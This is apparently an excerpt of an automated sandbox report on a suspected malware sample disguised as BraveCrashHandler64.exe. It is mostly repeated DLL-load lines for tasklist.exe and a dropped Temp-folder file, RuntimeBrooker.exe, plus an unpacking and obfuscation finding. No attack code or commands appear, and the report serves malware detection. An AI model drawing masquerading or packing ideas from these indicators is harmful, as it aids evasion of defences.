Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Section loaded: fwpuclnt.dll

Source: C:\Windows\SysWOW64\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: BraveCrashHandler64.exe

Static file information: File size 14419456 > 1048576

Source: BraveCrashHandler64.exe

Static PE information: Raw size of is bigger than: 0x100000 < 0xcc9000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 7.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 11.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 14.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 17.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 21.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 26.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 29.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;
